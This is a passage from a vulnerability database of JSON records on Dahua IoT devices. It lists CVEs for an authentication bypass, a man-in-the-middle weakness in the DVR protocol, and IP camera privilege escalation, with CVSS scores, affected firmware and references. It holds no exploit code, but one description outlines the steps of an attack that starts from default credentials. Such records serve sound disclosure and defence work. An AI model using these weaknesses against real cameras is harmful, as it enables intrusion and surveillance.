        "data": "Firmware upgrade authentication bypass vulnerability was found in Dahua IPC-HDW4300S and some IP products. The vulnerability was caused by internal Debug function. This particular function was used for problem analysis and performance tuning during product development phase. It allowed the device to receive only specific data (one direction, no transmit) and therefore it was not involved in any instance of collecting user privacy data or allowing remote code execution. plural Dahua Technology The product contains authentication vulnerabilities.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. DahuaIPC-HDW4300S is the IP camera equipment of Dahua Company of China. The following products are affected: Dahua IPC-HDW4300S; NVR11HS; IPC-HFW4X00; IPC-HDW4X00; IPC-HDBW4X00;",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-9316"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117519"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-9316"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-9316",
            "trust": 3.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1392",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-117519",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-9316",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117519"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-9316"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9316"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ]
      },
      "id": "VAR-201711-1048",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117519"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:14:05.688000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/"
          },
          {
            "title": "A variety of Dahua product authentication bypass vulnerability patches",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/111823"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-117519"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9316"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "http://www.dahuasecurity.com/annoucementsingle/security-advisory--high-risk-vulnerability-found-in-dahua-ipc-hdw4300s-and-some-ip-products_14731_231.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9316"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-9316"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/287.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117519"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-9316"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9316"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117519"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-9316"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9316"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-27T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-117519"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-9316"
          },
          {
            "date": "2018-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "date": "2017-11-27T17:29:00.207000",
            "db": "NVD",
            "id": "CVE-2017-9316"
          },
          {
            "date": "2017-05-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-27T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "date": "2017-12-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-117519"
          },
          {
            "date": "2017-12-20T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-9316"
          },
          {
            "date": "2018-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "date": "2017-12-20T20:40:59.923000",
            "db": "NVD",
            "id": "CVE-2017-9316"
          },
          {
            "date": "2017-11-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Dahua Technology Authentication vulnerabilities in products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201703-1043

    Vulnerability from variot - Updated: 2023-12-18 13:08

    An issue was discovered on Dahua DHI-HCVR7216A-S3 3.210.0001.10 build 2016-06-06 devices. The Dahua DVR Protocol, which operates on TCP Port 37777, is an unencrypted, binary protocol. Performing a Man-in-the-Middle attack allows both sniffing and injections of packets, which allows creation of fully privileged new users, in addition to capture of sensitive information. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. A man-in-the-middle attack vulnerability exists in DahuaDHI-HCVR7216A-S3V3.210.0001.10build2016-06-06. Devices using the following software and firmware are affected: 3.210.0001.10 build: 2016-6-6 version of NVR firmware, 2.400.0000.28.R build 2016-3-29 version of Camera firmware, Android-based gDSS software, 1.16.1 Build Date 2017-01-19 version of SmartPSS software

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201703-1043",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "nvr",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0001.10"
          },
          {
            "model": "nvr",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "3.210.0001.10 build 2016-06-06"
          },
          {
            "model": "security dhi-hcvr7216a-s3 build",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "3.210.0001.102016-06-06"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6432"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr_firmware:3.210.0001.10:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr7216a-s3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6432"
          }
        ]
      },
      "cve": "CVE-2017-6432",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.3,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2017-6432",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-02726",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "VHN-114635",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.1,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-6432",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-6432",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-02726",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201703-053",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-114635",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114635"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6432"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An issue was discovered on Dahua DHI-HCVR7216A-S3 3.210.0001.10 build 2016-06-06 devices. The Dahua DVR Protocol, which operates on TCP Port 37777, is an unencrypted, binary protocol. Performing a Man-in-the-Middle attack allows both sniffing and injections of packets, which allows creation of fully privileged new users, in addition to capture of sensitive information. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. A man-in-the-middle attack vulnerability exists in DahuaDHI-HCVR7216A-S3V3.210.0001.10build2016-06-06. Devices using the following software and firmware are affected: 3.210.0001.10 build: 2016-6-6 version of NVR firmware, 2.400.0000.28.R build 2016-3-29 version of Camera firmware, Android-based gDSS software, 1.16.1 Build Date 2017-01-19 version of SmartPSS software",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6432"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114635"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-6432",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-053",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-114635",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114635"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6432"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ]
      },
      "id": "VAR-201703-1043",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114635"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:08:54.100000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "HCVR7204/7208/7216A-S3",
            "trust": 0.8,
            "url": "http://www1.dahuasecurity.com/th/products/hcvr720472087216a-s3-1434.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-319",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-310",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114635"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6432"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "https://nullku7.github.io/stuff/exploit/dahua/2017/03/09/dahua-nvr-authbypass.html"
          },
          {
            "trust": 2.3,
            "url": "https://twitter.com/null_ku7/status/839814344351240193"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6432"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6432"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114635"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6432"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114635"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6432"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "date": "2017-03-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114635"
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "date": "2017-03-09T17:59:00.150000",
            "db": "NVD",
            "id": "CVE-2017-6432"
          },
          {
            "date": "2017-03-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-02726"
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114635"
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          },
          {
            "date": "2019-10-03T00:03:26.223000",
            "db": "NVD",
            "id": "CVE-2017-6432"
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua DHI-HCVR7216A-S3 Vulnerability to create a new user with full privileges on the device",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002238"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "encryption problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-053"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201703-1235

    Vulnerability from variot - Updated: 2023-12-18 12:51

    Dahua IP Camera devices 3.200.0001.6 can be exploited via these steps: 1. Use the default low-privilege credentials to list all users via a request to a certain URI. 2. Login to the IP camera with admin credentials so as to obtain full control of the target IP camera. During exploitation, the first JSON object encountered has a "Component error: login challenge!" message. The second JSON object encountered has a result indicating a successful admin login. Dahua IP Camera Devices have vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. DahuaIPCamera is a webcam from Dahua, China. A privilege escalation and information disclosure vulnerability exists in DahuaIPCamera 3.200.0001.6. An attacker can exploit these issues to gain elevated privileges and obtain unauthorized access to the sensitive information

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201703-1235",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ip camera",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.200.0001.6"
          },
          {
            "model": "ip camera",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "3.200.0001.6"
          },
          {
            "model": "security dahua ip camera",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
